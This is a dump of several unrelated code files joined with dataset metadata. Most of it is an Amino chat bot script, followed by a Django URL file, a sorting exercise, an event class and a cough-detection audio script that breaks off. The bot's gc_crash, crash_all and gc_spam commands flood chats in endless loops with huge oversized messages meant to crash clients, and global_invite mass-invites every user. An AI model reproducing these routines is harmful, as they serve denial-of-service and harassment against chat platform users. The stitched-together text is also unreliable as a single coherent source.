aa.profile.nickname):\n\t\t\t\tsubClient.subclient.invite_to_vc2(userId=userId,\n\t\t\t\t chatId=info,\n\t\t\t\t comId='x34240648')\n\t\t\t\tnm = nm + 1\n\t\t\t\tc = int(c + 1)\n\t\t\t\tprint(nickname + 'invited')\n\t\t\t\tif nm == 1000:\n\t\t\t\t\tnm = 0\n\t\texcept:\n\t\t\tnm = nm + 1\n\n\ndef unkeep_favorite_chats(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId) and (subClient.is_in_staff(authorId)\n\t or is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tchats = subClient.favorite_chats\n\t\tval = subClient.get_chats()\n\n\t\tfor title, chatid in zip(val.title, val.chatId):\n\t\t\tif message == title and chatid in chats:\n\t\t\t\tsubClient.remove_favorite_chats(chatid)\n\t\t\t\tsubClient.unfavorite(chatId=chatid)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Removed {title} to favorite chats\")\n\t\t\t\treturn\n\n\t\tfor title, chatid in zip(val.title, val.chatId):\n\t\t\tif message.lower() in title.lower() and chatid in chats:\n\t\t\t\tsubClient.remove_favorite_chats(chatid)\n\t\t\t\tsubClient.unfavorite(chatId=chatid)\n\t\t\t\tsubClient.send_message(chatId,\n\t\t\t\t f\"Removed {title} to favorite chats\")\n\t\t\t\treturn\n\n\ndef global_invite(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tnm = 0\n\tc = 0\n\twhile True:\n\t\ttry:\n\t\t\taa = client.get_all_users(start=nm, size=1)\n\t\t\tfor userId, nickname in zip(aa.profile.userId,\n\t\t\t aa.profile.nickname):\n\t\t\t\tsubClient.subclient.invite_to_vc2(userId=userId,\n\t\t\t\t chatId=chatId,\n\t\t\t\t comId='x34240648')\n\t\t\t\tnm = nm + 1\n\t\t\t\tc = int(c + 1)\n\t\t\t\tprint(nickname + 'invited to a voice chat')\n\t\t\t\tif nm == 1000:\n\t\t\t\t\tnm = 0\n\n\t\texcept:\n\t\t\tnm = nm + 1\n\n\ndef pvp(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tmsg = message + \" null null \"\n\tmsg = msg.split(\" 
\")\n\ttry:\n\t\trounds = int(msg[0])\n\texcept (TypeError, ValueError):\n\t\trounds = 5\n\t\tmsg[2] = msg[1]\n\t\tmsg[1] = msg[0]\n\t\tmsg[0] = 5\n\tsubClient.send_message(chatId=chatId,\n\t message=f\"fighting {msg[1]} e {msg[2]}...\")\n\twin1 = 0\n\twin2 = 0\n\tround = 0\n\tagess = ''\n\tdefens = ''\n\tfor pvp in range(0, rounds):\n\t\tround = round + 1\n\t\tsubClient.send_message(chatId=chatId,\n\t\t message=f\"[bc]Round {round}/{rounds}\")\n\t\tpunch = randint(0, 1)\n\t\tif punch == 0:\n\t\t\twin1 = win1 + 1\n\t\t\tagress = msg[1]\n\t\t\tdefens = msg[2]\n\t\telse:\n\t\t\twin2 = win2 + 1\n\t\t\tagress = msg[2]\n\t\t\tdefens = msg[1]\n\t\ttime.sleep(4)\n\t\tsubClient.send_message(chatId=chatId,\n\t\t message=f\"[ic] {agress} winner°° {defens}!\")\n\tif win1 > win2:\n\t\tsubClient.send_message(chatId=chatId, message=f\"[bcu]{msg[1]} winnerr\")\n\telif win1 < win2:\n\t\tsubClient.send_message(chatId=chatId,\n\t\t message=f\"[bcu]{msg[2]} winnerrrr!!\")\n\telif win1 == win2:\n\t\tsubClient.send_message(chatId=chatId, message=f\"[iC]victory.\")\n\n\ndef ship(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tcasal = message + \" null null \"\n\tpessoas = casal.split(\" \")\n\tporcentagem = uniform(0, 100)\n\tquote = ' '\n\tif porcentagem <= 10:\n\t\tquote = 'Sem chance.'\n\telif 10 <= porcentagem <= 25:\n\t\tquote = 'Eh...'\n\telif 25 <= porcentagem <= 50:\n\t\tquote = 'zada nahi chalega'\n\telif 50 <= porcentagem <= 75:\n\t\tquote = 'bonds ❤'\n\telif 75 <= porcentagem <= 100:\n\t\tquote = 'pure love❤'\n\tsubClient.send_message(\n\t chatId=chatId,\n\t message=f\"{pessoas[0]} x {pessoas[1]} tem {porcentagem:.2f}% \"\n\t f\"chances of getting in relation.\")\n\tsubClient.send_message(chatId=chatId, message=quote)\n\ttry:\n\t\tvalue = int(''.join(open(\"value\", 'r').readlines()))\n\texcept:\n\t\tpass\n\ttry:\n\t\tvalue = value + 1\n\texcept:\n\t\tpass\n\n\ndef Youtube(subClient=None,\n chatId=None,\n authorId=None,\n 
author=None,\n message=None,\n messageId=None):\n\ttry:\n\t\tsize = int(message.strip().split().pop())\n\t\tmsg = \" \".join(message.strip().split()[:-1])\n\t\tsearch = msg\n\texcept ValueError:\n\t\tsize = 1\n\t\tsearch = message\n\tif size > 5:\n\t\tsize = 5\n\tresults = YoutubeSearch(search, max_results=size).to_json()\n\t# pprint(results)\n\tresults = YoutubeSearch(search, max_results=size).to_dict()\n\tyt_reply = \"\"\n\tpprint(results)\n\tfor result in results:\n\t\ttitle = result['title']\n\t\tthumbnails = result['thumbnails'][0]\n\t\tyt_url = 'https://youtu.be/' + result['url_suffix']\n\t\tdr = result['duration']\n\t\tviews = result['views']\n\t\tyt_reply = yt_reply + str(title) + \"\\nViews: \" + str(\n\t\t views) + \"\\nDuration: \" + str(dr) + \"\\n\" + str(yt_url) + \"\\n\\n\"\n\twith suppress(Exception):\n\t\tsubClient.send_message(chatId=chatId, message=yt_reply)\n\tfor result in results:\n\t\tyt_url = 'https://youtu.be/' + result['url_suffix']\n\t\tconvert(subClient, chatId, authorId, author, message=yt_url)\n\n\ndef welcome_channel(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.set_welcome_chat(chatId)\n\t\tsubClient.send_message(chatId, \"Welcome channel set!\")\n\n\ndef get_stick(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tdata = subClient.get_message_info(chatId=chatId,\n\t messageId=messageId) # message\n\n\treply_message = data.json['extensions']\n\tif reply_message:\n\t\timage = data.json['extensions']['replyMessage']['extensions'][\n\t\t 'sticker']['icon']\n\t\tprint(\"\\n\\nurl\", image)\n\t\tfilename = image.split(\"/\")[-1]\n\t\tfiletype = image.split(\".\")[-1]\n\t\tif filetype != \"gif\":\n\t\t\tfiletype = \"image\"\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith 
suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=filetype)\n\t\t\t\tprint(os.remove(filename))\n\n\ndef unwelcome_channel(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.unset_welcome_chat()\n\t\tsubClient.send_message(chatId, \"Welcome channel unset!\")\n\n\ndef gc_crash(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Crash101\" * 50000\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsubClient.send_message(chatId, c, messageType=109)\n\t\t\texcept:\n\t\t\t\tpass\n\n\ndef safe_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Don't scroll up\" * 200\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tchatId_list = subClient.subclient.get_chat_threads().chatId\n\t\tfor i in range(1, 2):\n\t\t\tfor chat in chatId_list:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tsubClient.send_message(chat, c, messageType=0)\n\n\ndef crash_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Crash101\" * 50000\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tchatId_list = subClient.subclient.get_chat_threads().chatId\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tfor chat in chatId_list:\n\t\t\t\t\twith suppress(Exception):\n\t\t\t\t\t\tsubClient.send_message(chat, c, messageType=109)\n\t\t\texcept:\n\t\t\t\tpass\n\n\ndef send_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tchatId_list = 
subClient.subclient.get_chat_threads().chatId\n\t\tfor chat in chatId_list:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chat, message, messageType=0)\n\n\ndef gc_anti(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tc = \"Don't scroll up\" * 200\n\tchatid = client.get_from_code(message).objectId\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tfor i in range(1, 3):\n\t\t\tsubClient.send_message(chatid, c, messageType=0)\n\n\ndef gc_spam(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsubClient.send_message(chatId, message, messageType=109)\n\t\t\texcept:\n\t\t\t\tpass\n\n\ndef get_bg(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\timage = subClient.subclient.get_chat_thread(chatId).backgroundImage\n\tif image is not None:\n\t\tprint(image)\n\t\tfilename = image.split(\"/\")[-1]\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\t\t\tprint(os.remove(filename))\n\n\ndef trans_reply(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tdata = subClient.get_message_info(chatId=chatId,\n\t messageId=messageId) # message\n\treply_message = data.json['extensions']\n\tif reply_message:\n\t\treply_message = data.json['extensions']['replyMessage']['content']\n\t\treply_messageId = data.json['extensions']['replyMessage']['messageId']\n\t\ttranslator = google_translator()\n\t\tdetect_result = translator.detect(reply_message)[1]\n\t\ttranslate_text = translator.translate(reply_message)\n\t\treply = \"[IC]\" + str(\n\t\t translate_text) + 
\"\\n\\n[c]Translated Text from \" + str(\n\t\t detect_result)\n\t\tsubClient.send_message(chatId, reply, replyTo=reply_messageId)\n\n\ndef level(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\ttry:\n\t\t\tmessage = int(message)\n\t\texcept Exception:\n\t\t\tsubClient.send_message(chatId, \"Error, wrong level\")\n\t\t\treturn\n\t\tif message > 20:\n\t\t\tmessage = 20\n\t\tif message < 0:\n\t\t\tmessage = 0\n\t\tsubClient.set_level(message)\n\t\tsubClient.send_message(chatId, f\"Level set to {message}!\")\n\n\ndef taxe(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tcoins = subClient.get_wallet_amount()\n\t\tif coins >= 1:\n\t\t\tamt = 0\n\t\t\twhile coins > 500:\n\t\t\t\tsubClient.pay(500, chatId=chatId)\n\t\t\t\tcoins -= 500\n\t\t\t\tamt += 500\n\t\t\tsubClient.pay(int(coins), chatId=chatId)\n\t\t\tsubClient.send_message(chatId, f\"Sending {coins+amt} coins...\")\n\t\telse:\n\t\t\tsubClient.send_message(chatId, \"Account is empty!\")\n\n\ncommands_dict = {\n \"help\": helper,\n \"src\": src,\n \"copychat\": chat_copy,\n \"com\": vc_com,\n \"live\": global_invite,\n \"startvc\": start_vc,\n \"endvc\": end_vc,\n \"hh\": hh,\n \"vc\": join_vc,\n \"pvp\": pvp,\n \"ship\": ship,\n \"hh\": hh,\n \"day\": day,\n \"bclear\": bot_clear,\n \"profile\": profile,\n \"yt\": Youtube,\n \"editicon\": edit_icon,\n \"mentionall\": new_mention_all,\n \"ban\": ban,\n \"editbio\": edit_bio,\n \"editname\": edit_name,\n \"gspam\": gc_spam,\n \"get\": get_stick,\n \"achat\": gc_anti,\n \"gif\": gif_search,\n \"img\": img_search,\n \".\": gc_crash,\n \"gcrash\": crash_all,\n \"guard\": safe_all,\n \"bg\": get_bg,\n \"a\": send_all,\n \"title\": title,\n \"dice\": dice,\n \"tr\": trans_reply,\n \"join\": join,\n \"level\": level,\n 
\"give\": cus_k,\n \"leave\": leave,\n \"abw\": add_banned_word,\n \"rbw\": remove_banned_word,\n \"bwl\": banned_word_list,\n \"llock\": locked_command_list,\n \"view\": read_only,\n \"taxe\": taxe,\n \"clear\": clear,\n \"joinall\": join_all,\n \"leaveall\": leave_all,\n \"reboot\": reboot,\n \"stop\": stop,\n \"spam\": spam,\n \"mention\": mention,\n \"msg\": msg,\n \"alock\": admin_lock_command,\n \"uinfo\": uinfo,\n \"cinfo\": cinfo,\n \"joinamino\": join_amino,\n \"chatlist\": get_chats,\n \"sw\": sw,\n \"accept\": accept,\n \"chat_id\": chat_id,\n \"prank\": prank,\n \"prefix\": prefix,\n \"allock\": locked_admin_command_list,\n \"leaveamino\": leave_amino,\n \"sendinfo\": sendinfo,\n \"image\": image,\n \"all\": mentionall,\n \"block\": block,\n \"unblock\": unblock,\n \"follow\": follow,\n \"unfollow\": unfollow,\n \"unwelcome\": unwelcome_channel,\n \"stop_amino\": stop_amino,\n \"block\": block,\n \"unblock\": unblock,\n \"welcome\": welcome_channel,\n \"ask\": ask_thing,\n \"askstaff\": ask_staff,\n \"lock\": lock_command,\n \"unlock\": unlock_command,\n \"global\": get_global,\n \"heavydriver\": audio,\n \"convert\": convert,\n \"say\": say,\n \"keepu\": keep_favorite_users,\n \"unkeepu\": unkeep_favorite_users,\n \"keepc\": keep_favorite_chats,\n \"unkeepc\": unkeep_favorite_chats\n}\n\nhelpMsg = f\"\"\"\n[CB]-- COMMON COMMAND --\n\n★ help (command)\t: show this or the help associated to the command\n★ title (title)\t: edit titles*\n★ dice (xdy)\t: return x dice y (1d20) per default\n★ join (chat)\t: join the specified channel\n★ mention (user)\t: mention an user\n★ spam (amount)\t: spam an message (limited to 3)\n★ msg (type)\t: send a \"special\" message (limited to 3)\n★ bwl\t: the list of banneds words*\n★ llock\t: the list of locked commands\n★ chatlist\t: the list of public chats\n★ global (link)\t: give the global profile of the user\n★ leave\t: leave the current channel\n★ follow\t: follow you\n★ unfollow\t: unfollow you\n★ convert (url)\t: 
will convert and send the music from the url (9 min max)\n★ pvp: mention 2 user for fight\n★ ship: mention 2 user for ship\n★ prank (amount)\t will send coins\n★ src (search)\t for search\n★ image\t: will send an image\n★ say\t: will say the message in audio\n★ gif(text)\t: will send a gif\n★ give\t: gives you anything\n★ bg\t:gives bg of chat\n★ tr :translate word by replying\n★ get : get image or gif of ghe sticker\n\"\"\"\n\nstaff = \"\"\"\n[CB]-- STAFF COMMAND --\n\n• accept\\t: accept the staff role\n• abw (word list)\\t: add a banned word to the list*\n• rbw (word list)\\t: remove a banned word from the list*\n• sw (message)\\t: set the welcome message for new members (will start as soon as the welcome message is set)\n• welcome\\t: set the welcome channel**\n• unwelcome\\t: unset the welcome channel**\n• ask (message)(lvl=)\\t: ask to all level (lvl) something**\n• clear (amount)\\t: clear the specified amount of message from the chat (max 50)*\n• joinall\\t: join all public channels\n• leaveall\\t: leave all public channels\n• leaveamino\\t: leave the community\n• all\\t: mention all the users of a channel\n• lock (command)\\t: lock the command (nobody can use it)\n• unlock (command)\\t: remove the lock for the command\n• view\\t: set or unset the current channel to read-only\n• prefix (prefix)\\t: set the prefix for the amino\n• level (level)\\t: set the level required for the commands\n• keepu (user)\\t: keep in favorite an user*\n• unkeepu (user)\\t: remove from favorite an user*\n• keepc (chat)\\t: keep in favorite a chat*\n• unkeepc (chat)\\t: remove from favorite a chat*\n\"\"\"\n\nhelpAsk = \"\"\"\nExample :\n- !ask Hello! Can you read this : [poll | http://aminoapp/poll]? 
Have a nice day!^^ lvl=6\n\"\"\"\n\ntry:\n\twith open(path_config, \"r\") as file:\n\t\tdata = load(file)\n\t\tperms_list = data[\"admin\"]\n\t\tcommand_lock = data[\"lock\"]\n\t\tdel data\nexcept FileNotFoundError:\n\twith open(path_config, 'w') as file:\n\t\tfile.write(dumps({\"admin\": [], \"lock\": []}, indent=4))\n\tprint(\n\t \"Created config.json!\\nYou should put your Amino Id in the list admin\\nand the commands you don't want to use in lock\"\n\t)\n\tperms_list = []\n\tcommand_lock = []\n\ntry:\n\twith open(path_client, \"r\") as file_:\n\t\tlogin = file_.readlines()\nexcept FileNotFoundError:\n\twith open(path_client, 'w') as file_:\n\t\tfile_.write('email\\npassword')\n\tprint(\"Please enter your email and password in the file client.txt\")\n\tprint(\"-----end-----\")\n\tsys.exit(1)\n\nidentifiant = login[0].strip()\nmdp = login[1].strip()\n\nclient = Client()\nclient.login(email=identifiant, password=mdp)\nbotId = client.userId\namino_list = client.sub_clients()\n\ncommunaute = {}\ntaille_commu = 0\n\nfor command in command_lock:\n\tif command in commands_dict.keys():\n\t\tdel commands_dict[command]\n\n\ndef tradlist(sub):\n\tsublist = []\n\tfor elem in sub:\n\t\twith suppress(Exception):\n\t\t\tval = client.get_from_code(\n\t\t\t f\"http://aminoapps.com/u/{elem}\").objectId\n\t\t\tsublist.append(val)\n\t\t\tcontinue\n\t\twith suppress(Exception):\n\t\t\tval = client.get_user_info(elem).userId\n\t\t\tsublist.append(val)\n\t\t\tcontinue\n\treturn sublist\n\n\nperms_list = tradlist(perms_list)\n\n\ndef threadLaunch(commu):\n\twith suppress(Exception):\n\t\tcommi = BotAmino(client=client, community=commu)\n\t\tcommunaute[commi.community_id] = commi\n\t\tcommunaute[commi.community_id].run()\n\n\ntaille_commu = len([\n Thread(target=threadLaunch, args=[commu]).start()\n for commu in amino_list.comId\n])\n\n\ndef filtre_message(message, code):\n\tpara = normalize('NFD',\n\t message).encode(code,\n\t 'ignore').decode(\"utf8\").strip().lower()\n\tpara = 
para.translate(str.maketrans(\"\", \"\", punctuation))\n\treturn para\n\n\n@client.event(\"on_text_message\")\ndef on_text_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tmessage = data.message.content\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\t\treturn\n\n\tif not (is_it_me(authorId) or is_it_admin(authorId)\n\t or is_it_bot(authorId)) and not subClient.is_in_staff(\n\t authorId) and subClient.banned_words:\n\t\twith suppress(Exception):\n\t\t\tpara = filtre_message(message, \"ascii\").split()\n\n\t\t\tif para != [\"\"]:\n\t\t\t\tfor elem in para:\n\t\t\t\t\tif elem in subClient.banned_words:\n\t\t\t\t\t\tsubClient.delete_message(chatId,\n\t\t\t\t\t\t messageId,\n\t\t\t\t\t\t \"Banned word\",\n\t\t\t\t\t\t asStaff=True)\n\t\t\t\t\t\treturn\n\n\t\twith suppress(Exception):\n\t\t\tpara = filtre_message(message, \"utf8\").split()\n\n\t\t\tif para != [\"\"]:\n\t\t\t\tfor elem in para:\n\t\t\t\t\tif elem in subClient.banned_words:\n\t\t\t\t\t\tsubClient.delete_message(chatId,\n\t\t\t\t\t\t messageId,\n\t\t\t\t\t\t \"Banned word\",\n\t\t\t\t\t\t asStaff=True)\n\t\t\t\t\t\treturn\n\n\tif message.startswith(subClient.prefix) and not is_it_bot(authorId):\n\t\tauthor = data.message.author.nickname\n\t\tcommande = \"\"\n\t\tmessage = str(message).strip().split(communaute[commuId].prefix,\n\t\t 1).pop()\n\t\tcommande = str(message).strip().split(\" \", 1)[0].lower()\n\t\tif commande in subClient.locked_command and not (\n\t\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\treturn\n\t\tif commande in 
subClient.admin_locked_command and not (\n\t\t is_it_me(authorId) or is_it_admin(authorId)):\n\t\t\treturn\n\t\tif not subClient.is_level_good(authorId) and not (\n\t\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\tsubClient.send_message(\n\t\t\t chatId,\n\t\t\t f\"You don't have the level for that ({subClient.level})\")\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = str(message).strip().split(\" \", 1)[1]\n\t\texcept Exception:\n\t\t\tmessage = \"\"\n\telse:\n\t\treturn\n\n\twith suppress(Exception):\n\t\t[\n\t\t Thread(\n\t\t target=values,\n\t\t args=[subClient, chatId, authorId, author, message,\n\t\t messageId]).start()\n\t\t for key, values in commands_dict.items()\n\t\t if commande == key.lower()\n\t\t]\n\n\n@client.event(\"on_text_message\")\ndef on_text_message(data):\n\tcommuId = data.json[\"ndcId\"]\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\n\texcept Exception:\n\t\treturn\n\tchatId = data.message.chatId\n\tcontent = data.message.content\n\tif \"uwu\" in content or \"owo\" in content:\n\t\tval = os.listdir(path_picture)\n\t\tprint(\"VAL:\", val)\n\t\tif val:\n\t\t\tfile = choice(val)\n\t\t\tprint(\"File\", file)\n\t\t\twith suppress(Exception):\n\t\t\t\twith open(path_picture + \"/\" + file, 'rb') as fp:\n\t\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\telse:\n\t\t\tsubClient.send_message(chatId, \"Error! 
No file\")\n\n\n@client.event(\"on_image_message\")\ndef on_image_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\t\treturn\n\n\n@client.event(\"on_voice_message\")\ndef on_voice_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\t\treturn\n\n\n@client.event(\"on_sticker_message\")\ndef on_sticker_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\tmessageId = data.message.messageId\n\n\tif chatId in subClient.only_view and not (\n\t subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsubClient.delete_message(chatId,\n\t\t messageId,\n\t\t \"Read-only chat\",\n\t\t asStaff=True)\n\n\n@client.event(\"on_chat_invite\")\ndef on_chat_invite(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tchatId = 
data.message.chatId\n\n\tsubClient.join_chat(chatId=chatId)\n\tsubClient.send_message(\n\t chatId,\n\t f\"Hello!\\nI am a bot, if you have any question ask a staff member!^^\\nHow can I help you? (you can do {subClient.prefix}help for help)\"\n\t)\n\n\n@client.event(\"on_chat_tip\")\ndef on_chat_tip(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\traw_data = data.json\n\tnick_name = raw_data['chatMessage']['author']['nickname']\n\tcoins = raw_data['chatMessage']['extensions']['tippingCoins']\n\tchatId = raw_data['chatMessage']['threadId']\n\treply = \"[C]Thanks for \" + str(coins) + \" Props \\n\\n[C]\" + str(nick_name)\n\tprint(raw_data)\n\tprint(\"chatId\", chatId)\n\tsubClient.send_message(chatId=chatId, message=reply)\n\n@client.event(\"on_text_message\")\ndef on_text_message(data):\n\ttry:\n\t\tcommuId = data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\texcept Exception:\n\t\treturn\n\n\tcontent = data.message.content\n\tchatId = data.message.chatId\n\tauthorId = data.message.author.userId\n\ttry:\n\t link=content.split()[1]\n\texcept:\n\t pass\n\tmessageId = data.message.messageId\n\tif \"aminoapps.com/c\" in content or \"aminoapps.com/p\" in content or \"aminoapps.com/c\" in link or \"aminoapps.com/p\" in link:\n\t try:\n\t info = client.get_from_code(content)\n\t except:\n\t info=client.get_from_code(link)\n\t \n\t s=subClient.community_id\n\t comId = info.path[1:info.path.index(\"/\")]\n\t if comId != f'{commuId}':\n\t subClient.delete_message(chatId=data.message.chatId,messageId=data.message.messageId,asStaff=True,reason=\"link share\")\n\t subClient.subclient.warn(userId=data.message.author.userId,reason=\"Sending links of other community\")\n\n\ndef upload(url):\n\tlink = requests.get(url)\n\tresult = BytesIO(link.content)\n\treturn result\n\n\n@client.event('on_group_member_join')\ndef on_group_member_join(data):\n\tcommuId = data.json[\"ndcId\"]\n\ttry:\n\t\tcommuId 
= data.json[\"ndcId\"]\n\t\tsubClient = communaute[commuId]\n\t\tprint(\"comm ID\", commuId)\n\n\texcept Exception:\n\t\treturn\n\tnick = data.message.author.nickname\n\tsubClient.subclient.send_message(message=' ✧ Welcome ✧',\n\t chatId=data.message.chatId,\n\t embedTitle=data.message.author.nickname,\n\t embedImage=upload(\n\t data.message.author.icon))\n\n\nfrom time import sleep\n\n\ndef reconsocketloop():\n\twhile True:\n\t\tclient.close()\n\t\tclient.start()\n\t\tsleep(120)\n\n\nsocketloop = threading.Thread(target=reconsocketloop, daemon=True)\nsocketloop.start()","sub_path":"Community.py","file_name":"Community.py","file_ext":"py","file_size_in_byte":92926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"28565467","text":"\nfrom django.conf.urls import url\nfrom . import views # This line is new!\nurlpatterns = [\n\turl(r'^$', views.index), # Root route\n url(r'^process/register$', views.registerUser),\n url(r'^process/login$', views.loginUser),\n url(r'^process/logout$', views.logout),\n url(r'^success$', views.success)\n]\n","sub_path":"main/apps/first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"585426443","text":"# 10814번\n# https://yoonsang-it.tistory.com/\n\nn = int(input())\nuser_list = []\n\nfor i in range(n):\n user = input().split()\n user.append(i)\n user_list.append(user)\n\nsorted_list = sorted(user_list, key=lambda x : (int(x[0]), x[2]))\nfor i in range(len(sorted_list)):\n answer = \" \".join(sorted_list[i][:2])\n print(answer)","sub_path":"backjoon_python/back114.py","file_name":"back114.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"194437357","text":"# Created byMartin.cz\n# Copyright (c) Martin Strohalm. All rights reserved.\n\nfrom .. 
enums import *\nfrom . event import Event\n\n\nclass PropertyChangedEvt(Event):\n \"\"\"\n Defines an event which is fired if any property of a pero.PropertySet\n was changed.\n \n Attributes:\n \n name: str\n Name of the changed property.\n \n old_value: any\n Original value.\n \n new_value: any\n New value.\n \"\"\"\n \n TYPE = EVT_PROPERTY_CHANGED\n \n \n def __init__(self, **kwargs):\n \"\"\"Initializes a new instance of PropertyChangedEvt.\"\"\"\n \n self.name = None\n self.old_value = None\n self.new_value = None\n \n super().__init__(**kwargs)\n \n \n @classmethod\n def from_evt(cls, evt):\n \"\"\"\n Initializes a new instance of given class by copying all current data.\n \n Args:\n evt: pero.PropertyChangedEvt\n Source event from which to copy the data.\n \n Returns:\n cls instance\n New instance of requested class.\n \"\"\"\n \n return cls(\n name = evt.name,\n old_value = evt.old_value,\n new_value = evt.new_value)\n","sub_path":"pero/events/prop.py","file_name":"prop.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638940983","text":"#Commented file \nimport os\nimport argparse \n\nfrom scipy.io import wavfile \n\nfrom python_speech_features import mfcc\nfrom joblib import dump,load \n\nimport numpy as np\nimport sounddevice as sd\nimport queue\nimport matplotlib.pyplot as plt\nimport librosa.display\nimport soundfile as sf\nimport HMM #self define module\nimport psutil\nfrom memory_profiler import profile\n\n\n\ntest_folder=\"./WenReiCough/Cough/\"\n\nAUDIO_DEVICE='Microphone (Realtek(R) Audio), Windows DirectSound'\nSAMPLING_RATE = 8000\n#default block size 